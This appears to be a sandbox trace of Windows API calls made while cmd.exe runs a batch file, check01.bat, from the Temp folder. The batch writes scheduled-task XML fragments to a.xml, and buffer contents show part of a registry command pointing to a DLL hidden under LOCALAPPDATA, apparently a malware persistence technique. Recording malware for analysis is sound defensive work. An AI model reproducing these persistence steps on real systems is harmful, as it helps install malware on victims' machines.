[0378.248] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.248] GetFileType (hFile=0x64) returned 0x1
[0378.248] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.248] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0378.249] GetProcessHeap () returned 0x200000
[0378.249] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.249] GetProcessHeap () returned 0x200000
[0378.249] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.249] GetProcessHeap () returned 0x200000
[0378.249] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.249] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.249] GetProcessHeap () returned 0x200000
[0378.249] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.249] GetProcessHeap () returned 0x200000
[0378.250] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.250] GetProcessHeap () returned 0x200000
[0378.250] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.250] _tell (_FileHandle=3) returned 1757
[0378.263] _close (_FileHandle=3) returned 0
[0378.263] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.263] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.263] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.264] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.264] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.264] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.264] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.264] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.264] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.264] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.264] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.264] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.264] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.264] GetFileType (hFile=0x7) returned 0x2
[0378.265] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.266] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.266] _dup (_FileHandle=1) returned 3
[0378.267] _close (_FileHandle=1) returned 0
[0378.268] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.268] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.268] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.268] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.268] GetFileType (hFile=0x64) returned 0x1
[0378.269] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2c0
[0378.269] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x2bf
[0378.269] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.269] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.269] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x90) returned 0x220470
[0378.270] GetProcessHeap () returned 0x200000
[0378.270] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x90
[0378.270] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="IgnoreNew \r\n") returned 63
[0378.270] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.270] GetFileType (hFile=0x64) returned 0x1
[0378.270] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.270] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="IgnoreNew \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IgnoreNew \r\n", lpUsedDefaultChar=0x0) returned 64
[0378.270] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x3f, lpOverlapped=0x0) returned 1
[0378.270] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.272] _close (_FileHandle=3) returned 0
[0378.273] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.273] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.274] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.274] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.275] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.275] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.275] SetConsoleInputExeNameW () returned 0x1
[0378.275] GetConsoleOutputCP () returned 0x1b5
[0378.276] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.276] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.276] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.276] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.276] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.277] SetFilePointer (in: hFile=0x64, lDistanceToMove=1757, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0378.277] GetProcessHeap () returned 0x200000
[0378.277] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220510 | out: hHeap=0x200000) returned 1
[0378.277] GetProcessHeap () returned 0x200000
[0378.277] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0378.277] GetProcessHeap () returned 0x200000
[0378.277] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.277] GetProcessHeap () returned 0x200000
[0378.278] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc90 | out: hHeap=0x200000) returned 1
[0378.278] GetProcessHeap () returned 0x200000
[0378.278] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.278] GetProcessHeap () returned 0x200000
[0378.278] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.278] GetProcessHeap () returned 0x200000
[0378.278] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.278] GetProcessHeap () returned 0x200000
[0378.278] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.278] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.279] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0378.279] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x855, lpOverlapped=0x0) returned 1
[0378.279] SetFilePointer (in: hFile=0x64, lDistanceToMove=1846, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0378.279] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=89, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 89
[0378.279] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.279] GetFileType (hFile=0x64) returned 0x1
[0378.279] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.279] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0378.279] GetProcessHeap () returned 0x200000
[0378.279] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.280] GetProcessHeap () returned 0x200000
[0378.280] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.280] GetProcessHeap () returned 0x200000
[0378.280] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.280] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.280] GetProcessHeap () returned 0x200000
[0378.280] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.280] GetProcessHeap () returned 0x200000
[0378.280] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.281] GetProcessHeap () returned 0x200000
[0378.281] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.281] _tell (_FileHandle=3) returned 1846
[0378.281] _close (_FileHandle=3) returned 0
[0378.282] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.282] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.282] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.282] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.282] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.282] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.282] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.282] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.282] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.282] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.282] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.282] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.282] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.282] GetFileType (hFile=0x7) returned 0x2
[0378.283] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.283] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.284] _dup (_FileHandle=1) returned 3
[0378.285] _close (_FileHandle=1) returned 0
[0378.285] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.286] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.286] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.286] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.286] GetFileType (hFile=0x64) returned 0x1
[0378.286] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ff
[0378.286] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x2fe
[0378.286] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.286] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.287] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x94) returned 0x220470
[0378.287] GetProcessHeap () returned 0x200000
[0378.287] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x94
[0378.287] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="false \r\n") returned 65
[0378.287] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.287] GetFileType (hFile=0x64) returned 0x1
[0378.287] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.287] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="false \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="false \r\n", lpUsedDefaultChar=0x0) returned 66
[0378.287] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x41, lpOverlapped=0x0) returned 1
[0378.287] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.325] _close (_FileHandle=3) returned 0
[0378.326] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.326] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.326] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.326] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.327] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.327] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.328] SetConsoleInputExeNameW () returned 0x1
[0378.328] GetConsoleOutputCP () returned 0x1b5
[0378.328] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.328] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.329] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.329] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.329] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.329] SetFilePointer (in: hFile=0x64, lDistanceToMove=1846, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0378.329] GetProcessHeap () returned 0x200000
[0378.329] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220520 | out: hHeap=0x200000) returned 1
[0378.329] GetProcessHeap () returned 0x200000
[0378.330] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0378.330] GetProcessHeap () returned 0x200000
[0378.330] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.330] GetProcessHeap () returned 0x200000
[0378.330] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc90 | out: hHeap=0x200000) returned 1
[0378.330] GetProcessHeap () returned 0x200000
[0378.330] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.330] GetProcessHeap () returned 0x200000
[0378.330] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.330] GetProcessHeap () returned 0x200000
[0378.331] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.331] GetProcessHeap () returned 0x200000
[0378.331] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.331] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.331] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x736
[0378.331] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x7fc, lpOverlapped=0x0) returned 1
[0378.332] SetFilePointer (in: hFile=0x64, lDistanceToMove=1927, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0378.332] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^false^ >> %temp%\\a.xml\r\n", cbMultiByte=81, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^false^ >> %temp%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 81
[0378.332] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.332] GetFileType (hFile=0x64) returned 0x1
[0378.332] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.332] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0378.332] GetProcessHeap () returned 0x200000
[0378.332] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.332] GetProcessHeap () returned 0x200000
[0378.332] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.333] GetProcessHeap () returned 0x200000
[0378.333] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.333] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.333] GetProcessHeap () returned 0x200000
[0378.333] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.333] GetProcessHeap () returned 0x200000
[0378.333] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.333] GetProcessHeap () returned 0x200000
[0378.334] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.334] _tell (_FileHandle=3) returned 1927
[0378.334] _close (_FileHandle=3) returned 0
[0378.334] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.334] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.334] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.335] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.335] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.335] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.335] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.335] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.335] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.335] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.335] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.335] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.335] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.335] GetFileType (hFile=0x7) returned 0x2
[0378.425] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.425] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.426] _dup (_FileHandle=1) returned 3
[0378.427] _close (_FileHandle=1) returned 0
[0378.428] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.428] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.428] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.428] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.428] GetFileType (hFile=0x64) returned 0x1
[0378.428] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x340
[0378.429] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x33f
[0378.429] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.429] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.429] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x84) returned 0x220470
[0378.429] GetProcessHeap () returned 0x200000
[0378.429] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x84
[0378.430] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="false \r\n") returned 57
[0378.430] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.430] GetFileType (hFile=0x64) returned 0x1
[0378.430] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.430] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="false \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="false \r\n", lpUsedDefaultChar=0x0) returned 58
[0378.430] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x39, lpOverlapped=0x0) returned 1
[0378.430] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.432] _close (_FileHandle=3) returned 0
[0378.433] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.433] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.434] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.434] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.434] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.434] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.435] SetConsoleInputExeNameW () returned 0x1
[0378.435] GetConsoleOutputCP () returned 0x1b5
[0378.435] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.435] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.436] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.436] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.436] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.436] SetFilePointer (in: hFile=0x64, lDistanceToMove=1927, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0378.436] GetProcessHeap () returned 0x200000
[0378.437] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc60 | out: hHeap=0x200000) returned 1
[0378.437] GetProcessHeap () returned 0x200000
[0378.437] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0378.437] GetProcessHeap () returned 0x200000
[0378.438] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.438] GetProcessHeap () returned 0x200000
[0378.438] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.438] GetProcessHeap () returned 0x200000
[0378.438] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.438] GetProcessHeap () returned 0x200000
[0378.438] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x231400 | out: hHeap=0x200000) returned 1
[0378.438] GetProcessHeap () returned 0x200000
[0378.438] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.438] GetProcessHeap () returned 0x200000
[0378.438] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.438] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.439] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x787
[0378.439] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x7ab, lpOverlapped=0x0) returned 1
[0378.439] SetFilePointer (in: hFile=0x64, lDistanceToMove=1966, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ae
[0378.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=39, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nStopIfGoingOnBatteries^> >> %temp%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 39
[0378.439] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.439] GetFileType (hFile=0x64) returned 0x1
